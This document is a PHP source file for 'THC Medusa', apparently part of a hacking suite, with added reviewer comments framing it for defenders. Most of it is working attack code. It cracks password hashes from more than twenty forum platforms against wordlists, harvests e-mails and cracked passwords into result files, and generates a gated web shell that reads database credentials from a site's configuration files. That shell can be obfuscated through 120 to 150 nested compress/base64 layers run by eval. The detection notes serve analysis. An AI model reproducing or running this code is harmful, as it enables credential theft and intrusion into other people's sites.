..going to create a new app for the hacksuite. We're not going to do anything fancy here; we will make a simple app to get familiar with how to write compatible scripts for the suite. We..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/*
Contains all functionality for Medusa.
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
/* THC Medusa Class */
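class THC{
    /*
     * Reviewer overview: this class is the back end of an offline password-guessing
     * and credential-harvesting tool. It is annotated for analysts and defenders:
     * the comments describe what each method does, which artifacts it leaves on
     * disk, and which weaknesses in the targeted password schemes it depends on.
     * Only the input filter (ExploitFilter) and one array append have been changed;
     * every other statement is as published.
     *
     * The mysql_* functions used throughout belong to the legacy ext/mysql
     * extension (removed in PHP 7), so the file targets PHP 5.
     */

    // Lines of the loaded wordlist (set by LoadWordlist); starts as an empty string.
    var $aWords = "";
    // Product description array copied from $_PROPERTIES of an included file (set by LoadProperties).
    var $aProperties = "";
    // List of user rows to test; each row is read with the keys 'crackuser', 'crackpass' and optionally 'crackhash'.
    var $aUserHash = "";

    /* main */
    // PHP 4 style constructor name; on PHP 8 this is an ordinary, empty method.
    function THC(){
    }

    /*
     * Loads a wordlist from ../../Wordlists/ into $this->aWords, one element per line.
     * $sWordlist is passed through ExploitFilter() in file-inclusion mode before it
     * is appended to the fixed directory prefix.
     * Returns true on success, false when file() fails (errors are suppressed with @).
     */
    function LoadWordlist($sWordlist){
        $sWordlist = "../../Wordlists/".$this->ExploitFilter($sWordlist,0,1);
        if(false===($aFileData = @file($sWordlist))){
            return(false);
        }
        $this->aWords = $aFileData;
        return(true);
    }

    /*
     * Includes a product definition file from ../forums/ and copies the $_PROPERTIES
     * array that the file is expected to define into $this->aProperties.
     * Returns false when the file does not exist, true otherwise.
     *
     * NOTE(review): include_once executes the target as PHP, so the only barrier
     * between the $sProduct argument and code execution is ExploitFilter(). A fixed
     * allowlist of known product file names would be the safer design.
     * NOTE(review): if the file was already included earlier in the request,
     * include_once does nothing and $_PROPERTIES will be undefined here.
     */
    function LoadProperties($sProduct){
        $sProduct = "../forums/".$this->ExploitFilter($sProduct,0,1);
        if(!file_exists($sProduct)){
            return(false);
        }
        include_once($sProduct);
        $this->aProperties = $_PROPERTIES;
        return(true);
    }

    /*
     * Runs the query stored in $this->aProperties['queryraw']['attack'] on the
     * current mysql_* connection and stores every row, as an associative array,
     * in $this->aUserHash. The row count is stored in $this->aProperties['total'].
     * All database errors are hidden by the @ operator, so a failed query simply
     * leaves an empty user list.
     */
    function LoadUsers(){
        $rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
        // UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
        // $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
        $this->aProperties['total'] = @mysql_num_rows($rQuery);
        $this->aUserHash = array();
        if($this->aProperties['total']!=0){
            while(false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
                $this->aUserHash[] = $aRow;
            }
        }
    }

    /*
     * Appends one caller-supplied user row to $this->aUserHash (single-target mode,
     * as opposed to LoadUsers() which reads a whole table).
     */
    function SetUser($aUser){
        $this->aUserHash[] = $aUser;
    }

    /*
     * Looks up the e-mail address for a user name: the literal "/user/" in the
     * 'getemail' query template is replaced by $sUser and column 'temail' of the
     * first row is returned.
     *
     * NOTE(review): $sUser is substituted into the SQL text without escaping or a
     * bound parameter, so a user name containing quote characters changes the query.
     */
    function GetEmail($sUser){
        $rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
        return(@mysql_result($rQuery,0,'temail'));
    }

    /*
     * Tests one candidate password against one stored hash, using the scheme
     * selected by $this->aProperties['name'].
     *
     *   $sUser  user name (only used by the SMF schemes)
     *   $sPass  candidate password, trimmed before use
     *   $sHash  stored hash to compare against
     *   $sSalt  stored salt, where the scheme has one
     *
     * Returns true when the candidate reproduces the stored hash.
     *
     * Defender note: most branches below are one or two rounds of MD5 or SHA-1,
     * several with no salt at all. That is what makes wordlist guessing against a
     * leaked user table practical; applications still storing passwords this way
     * should migrate to password_hash()/password_verify() and rehash on next login.
     *
     * The helpers phpbb_check_hash, user_check_password2, PassHashing, PassHashing2,
     * PasswordHash and Gdn_PasswordHash2 are not defined in this file; presumably
     * they are supplied by the included product definition - TODO confirm.
     */
    function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
        $sEncrypt = "";
        $sPass = trim($sPass);
        switch($this->aProperties['name']){
            case "SMF1":
                $sEncrypt = @sha1(strtolower($sUser).$sPass);
                break;
            case "SMF2":
                $sEncrypt = @sha1(strtolower($sUser).$sPass);
                break;
            case "MyBB":
                $sEncrypt = @md5(md5($sSalt).md5($sPass));
                break;
            case "IPB":
                $sEncrypt = @md5(md5($sSalt).md5($sPass));
                break;
            case "vBulletin4":
                $sEncrypt = @md5(md5($sPass).$sSalt);
                break;
            case "vBulletin3":
                $sEncrypt = @md5(md5($sPass).$sSalt);
                break;
            case "vBulletin5":
                $sEncrypt = @md5(md5($sPass).$sSalt);
                break;
            case "FluxBB":
                $sEncrypt = @sha1($sPass);
                break;
            case "phpBB":
                return(phpbb_check_hash($sPass,$sHash) ? true : false);
                break;
            case "Drupal6":
                $sEncrypt = @md5($sPass);
                break;
            case "Drupal7":
                return(user_check_password2($sPass,$sHash) ? true : false);
                break;
            case "Dolphin":
                $sEncrypt = sha1(md5($sPass).$sSalt);
                break;
            case "Joomla3":
                return(PassHashing($sPass,$sHash) ? true : false);
                break;
            case "Joomla2":
                return(PassHashing2($sPass,$sHash) ? true : false);
                break;
            case "Wordpress":
                $cWP = new PasswordHash();
                return($cWP->CheckPassword($sPass,$sHash) ? true : false);
            case "Vanilla":
                $cVanilla = new Gdn_PasswordHash2();
                return($cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true : false);
                break;
            case "AEF":
                $sEncrypt = md5($sSalt.$sPass);
                break;
            case "MiniBB":
                $sEncrypt = md5($sPass);
                break;
            case "Phorum":
                $sEncrypt = md5($sPass);
                break;
            case "UseBB":
                $sEncrypt = md5($sPass);
                break;
            case "phpFusion":
                $sEncrypt = hash_hmac("sha256",$sPass,$sSalt);
                break;
            case "AVS":
                $sEncrypt = md5($sPass);
                break;
            case "XMB":
                $sEncrypt = md5($sPass);
                break;
        }
        // NOTE(review): loose == on hex digests is subject to PHP type juggling
        // (numeric-looking strings are compared as numbers). Authentication code
        // should compare digests with hash_equals() instead.
        return($sEncrypt==$sHash ? true : false);
    }

    /*
     * Runs every word in $this->aWords against every row in $this->aUserHash and
     * records progress on disk.
     *
     *   $iType  0: store (user name, e-mail from GetEmail()) for each match
     *           otherwise: store (user name, matching word)
     *
     * Artifacts written (useful when examining a host where this tool was run):
     *   results/<id>.txt  a PHP-serialized array with the keys tstart, total,
     *                     product, version, matches, start, current, last_user,
     *                     users and identifier; rewritten every 10th user, on
     *                     every match and once at the end
     *   tasks.php         one line "<id>|<unix start time>|0" appended at start,
     *                     rewritten to end in "|1" when the run completes
     * <id> is the first 10 hex characters of sha1(time().mt_rand(0,10000)).
     *
     * NOTE(review): the results file holds recovered credentials or e-mail
     * addresses in clear text under a short, time-derived name.
     */
    function CrackUsers($iType){
        $iUsers = count($this->aUserHash);
        if($iUsers!=0){
            // if there are users to crack
            $aData = array();
            $aData['tstart'] = time();
            $aData['total'] = $iUsers;
            $aData['product'] = $this->aProperties['name'];
            $aData['version'] = $this->aProperties['version'];
            $aData['matches'] = 0;
            $aData['start'] = date('d-m H:i',$aData['tstart']);
            $aData['current'] = 0;
            $aData['last_user'] = "";
            $aData['users'] = array();
            // create session identifier and filename to store the results into
            $sFileSession = substr(sha1(time().mt_rand(0,10000)),0,10);
            $sResultsFile = "results/".$sFileSession.".txt";
            $aData['identifier'] = $sFileSession;
            // create results file
            $this->WriteF($sResultsFile,serialize($aData),"w");
            // insert record into task file
            $this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
            for($x=0;$x<$iUsers;$x++){
                $aData['current']++;
                // integer division result only when 'current' is a multiple of 10
                if(is_int($aData['current']/10)){
                    $this->WriteF($sResultsFile,serialize($aData),"w");
                }
                for($y=0;$y<count($this->aWords);$y++){
                    // 'crackpass' is passed as the stored hash, 'crackhash' (when present) as the salt
                    if(@$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
                        // easy user password, store the email and username
                        $aData['matches']++;
                        $aData['last_user'] = $this->aUserHash[$x]['crackuser'];
                        if($iType==0){
                            $aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
                        }
                        else{
                            $aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
                        }
                        $this->WriteF($sResultsFile,serialize($aData),"w");
                        continue;
                    }
                }
            }
            // finalize record in task file
            $this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
            // finalize record in data file
            $this->WriteF($sResultsFile,serialize($aData),"w");
        }
    }

    /*
     * Reads results/<id>.txt for every task row in $aData (the id is element 0 of
     * each row), unserializes it and returns all records as one JSON string.
     *
     * NOTE(review): unserialize() on file contents is unsafe if anything other
     * than this class can write to results/ (PHP object injection). The records
     * are plain arrays, so json_encode()/json_decode() would be a safer storage
     * format; on PHP 7+ pass array('allowed_classes' => false) as second argument.
     * NOTE(review): $aData[$x][0] is concatenated into the path without filtering.
     */
    function CreateJSON($aData){
        $aRecords = array();
        for($x=0;$x<count($aData);$x++){
            // every iteration is a (running) task
            $sData = @file_get_contents("results/".$aData[$x][0].".txt");
            if($sData!=false){
                $aRecords[] = @unserialize($sData);
            }
        }
        return(json_encode($aRecords));
    }

    /*
     * Returns the names of all non-directory entries directly inside $sDir,
     * or false when the directory cannot be opened.
     */
    function GetFilesByDirectory($sDir){
        if(!$rHandle = @opendir($sDir)){
            return(false);
        }
        $aFileBuffer = array();
        while(false!==($sFile = @readdir($rHandle))){
            // buffer all files
            if($sFile!="." && $sFile!=".."){
                if(!is_dir($sDir."/".$sFile)){
                    // plain append (the original used ".=" on a fresh element, same result)
                    $aFileBuffer[] = $sFile;
                }
            }
        }
        @closedir($rHandle);
        return $aFileBuffer;
    }

    /*
     * Returns the path of every non-directory entry below $sDir, recursively.
     * Despite the name, no filtering on the .php extension takes place.
     */
    function GetPHPFiles($sDir){
        $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        $aData = array();
        foreach($iterator as $path){
            if(!$path->isDir()){
                $aData[] = ($path->__toString());
            }
        }
        return($aData);
    }

    /*
     * Returns the paths of all files below $sDir that define a $_SYSTEM variable
     * when included.
     *
     * NOTE(review): every file under $sDir is executed via include_once just to
     * probe for that variable, so any file that lands in this tree runs with the
     * privileges of the tool. Because of include_once, a file that was already
     * included earlier in the request is not detected again.
     */
    function GetSystemFiles($sDir){
        $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        $aData = array();
        foreach($iterator as $path){
            unset($_SYSTEM);
            if(!$path->isDir()){
                $sPath = $path->__toString();
                include_once($sPath);
                if(isset($_SYSTEM)){
                    $aData[] = $sPath;
                }
            }
        }
        return($aData);
    }

    /*
     * Reads $sFile and splits every line on $sSeparate; returns an array of
     * arrays, or false when the file cannot be read or is empty.
     * Line endings are not stripped, so the last field of each row keeps its "\n".
     */
    function RawToArray($sFile,$sSeparate="|"){
        if(!$aFileData = @file($sFile)){
            return(false);
        }
        $aDataBuffer = array();
        for($x=0;$x<count($aFileData);$x++){
            // explode() with a non-empty separator always yields a non-empty array,
            // so this branch is not expected to be taken
            if(!$aDataBuffer[$x] = @explode($sSeparate,$aFileData[$x])){
                if($aFileData[$x]==""){
                    continue;
                }
            }
        }
        return($aDataBuffer);
    }

    /*
     * Input filter used before a caller-supplied value is placed in a file path,
     * HTML output or SQL text.
     *
     *   $sString  value to filter; non-strings are returned unchanged
     *   $bXSS     strip HTML/PHP tags
     *   $bFI      file-inclusion mode: keep only [a-zA-Z0-9-_./ ] and remove
     *             "../" and "./" sequences
     *   $bSQL     escape with mysql_real_escape_string()
     *
     * Fixes over the published version, both in the $bFI branch:
     *  - the character allowlist was written as '[^...]' so preg_replace() took
     *    the brackets as pattern delimiters and the class was never applied;
     *    it now has real delimiters
     *  - "../" and "./" were each removed in a single pass, which can leave a
     *    traversal sequence behind when the input nests them; removal now repeats
     *    until the string no longer changes
     * The allowlist runs first so that dropping a character cannot join two
     * fragments into a new "../" afterwards.
     *
     * This remains a denylist-style sanitizer; callers that can do so should map
     * the request to a fixed set of known file names instead.
     */
    function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
        if($bXSS==false && $bFI==false && $bSQL==false){
            return($sString);
        }
        if(!is_string($sString)){
            return($sString);
        }
        if($bXSS){
            $sString = strip_tags($sString);
        }
        if($bFI){
            $sString = preg_replace('/[^a-zA-Z0-9\-_.\/ ]/','',$sString);
            do{
                $sBefore = $sString;
                $sString = str_replace(array("../","./"),"",$sString);
            }while($sString!==$sBefore);
        }
        if($bSQL){
            $sString = mysql_real_escape_string($sString);
        }
        return($sString);
    }

    /*
     * Writes $sWrite to $sDest. $sMode is "w" (truncate) or "a" (append); any
     * other value falls back to "a". Returns false when the file cannot be
     * opened, true otherwise (the result of the write itself is not checked).
     */
    function WriteF($sDest,$sWrite,$sMode="a"){
        if($sMode!="a" && $sMode!="w"){
            $sMode = "a";
        }
        if(!$rNew = @fopen($sDest,$sMode)){
            return(false);
        }
        @fputs($rNew,$sWrite);
        @fclose($rNew);
        return(true);
    }

    /*
     * Opens a mysql_* connection with $aCredentials['host'|'username'|'password']
     * and selects $aCredentials['database']. Nothing is returned and failures are
     * suppressed, so callers cannot tell whether the connection succeeded.
     */
    function MySQLConnect($aCredentials){
        $rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
        @mysql_select_db($aCredentials['database']);
    }

    /*
     * Generates the source text of a standalone PHP script and either writes it
     * to $aOptions['shellcreate'] (returning WriteF()'s result) or returns it
     * HTML-escaped with <br /> line breaks for display.
     *
     * What the generated script does, as built below: it walks DOCUMENT_ROOT,
     * looks for a path containing $aSystem['file'], applies the four regexes in
     * $aSystem['patterns'] (user, database, password, host) to that file's
     * contents, prints the captured values and exits. In other words it reads
     * database credentials out of an application's configuration file.
     *
     * Optional wrappers: 'ip' (REMOTE_ADDR gate), 'pass' (password form gate),
     * 'encrypt' ("normal" = one eval/base64 layer, anything else = the lookup
     * table encoder further down).
     *
     * Detection notes for defenders, all taken from the literals in this method:
     *  - plain output starts with set_time_limit(0); followed by a
     *    RecursiveDirectoryIterator over $_SERVER['DOCUMENT_ROOT'] and ends with
     *    die("Failed to get login information.");
     *  - the IP gate redirects other clients to http://www.google.com
     *  - the password gate compares sha1($_POST['sPass']) with an embedded
     *    unsalted SHA-1 digest and renders a bare form with a field named sPass
     *  - "normal" mode yields a file whose whole body is eval(base64_decode('...'))
     *  - the other mode always begins with the fixed assignment
     *    $sPull = "leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped";
     *    which is a stable string to search for in web roots and upload directories
     * File-integrity monitoring of the web root and alerting on new PHP files
     * that contain eval( of decoded data cover both variants.
     */
    function MedusaShell($aSystem,$aOptions){
        $sShell = "set_time_limit(0);\n";
        $sTemplate = "";
        if(isset($aOptions['ip'])){
            // ip protection
            $sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
            $sShell .= " header(\"Location: http://www.google.com\");\n";
            $sShell .= " exit;\n";
            $sShell .= "}\n";
        }
        if(isset($aOptions['pass'])){
            // password protection
            $sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
            $sShell .= " echo'<html>\n";
            $sShell .= " <head></head>\n";
            $sShell .= " <body>\n";
            $sShell .= " <form method=\"post\">\n";
            $sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
            $sShell .= " </form>\n";
            $sShell .= " </body>\n";
            $sShell .= " </html>';\n";
            $sShell .= " exit;\n";
            $sShell .= "}\n";
        }
        // create shell based on system array
        $sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
        $sShell .= "foreach(\$iterator as \$path){\n";
        $sShell .= " if(!\$path->isDir()){\n";
        $sShell .= " \$sPath = \$path->__toString();\n";
        $sShell .= " \$sFile = \"".$aSystem['file']."\";\n";
        $sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
        $sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
        $sShell .= " }\n";
        $sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";
        $sShell .= " \$sData = file_get_contents(\$sPath);\n";
        $sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
        $sShell .= " if(!isset(\$aUser[1])){\n";
        $sShell .= " continue;\n";
        $sShell .= " }\n";
        $sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
        $sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
        $sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
        $sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
        $sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
        $sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
        $sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
        $sShell .= " die(\$sResult);\n";
        $sShell .= " }\n";
        $sShell .= " }\n";
        $sShell .= "}\n";
        $sShell .= "die(\"Failed to get login information.\");\n";
        if(isset($aOptions['encrypt'])){
            // source protection
            if($aOptions['encrypt']=="normal"){
                $sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";
            }
            else{
                // Preamble emitted into the output: a fixed sentence ($sPull) from which
                // function-name strings are assembled character by character into $aF,
                // so the names listed in the trailing comments never appear literally.
                $sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
                $sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
                $sEncoder .= "\$aF = array();\n";
                $sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
                $sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
                $sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
                $sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
                $sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
                $sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
                $sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
                $sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
                // encode and decode functions
                $_ENCODE = array();
                $_ENCODE[0] = array(7,"gzcompress");
                $_ENCODE[1] = array(4,"base64_encode");
                $_DECODE = array();
                $_DECODE[0] = array(6,"gzuncompress");
                $_DECODE[1] = array(5,"base64_decode");
                // good luck decrypting the shell :p
                // 120 to 150 rounds; each round replaces $sShell with a call expression
                // through the $aF table around the transformed previous value
                $iEncryptions = count($_ENCODE)-1;
                $iEncryptionLoops = mt_rand(120,150);
                for($x=0;$x<$iEncryptionLoops;$x++){
                    $iEncryption = mt_rand(0,$iEncryptions);
                    $sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
                }
                $sShell = $sEncoder.$sShell.";";
            }
        }
        if(isset($aOptions['shellcreate'])){
            // save source
            return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
        }
        else{
            $sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
            return($sShell);
        }
    }
}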
?>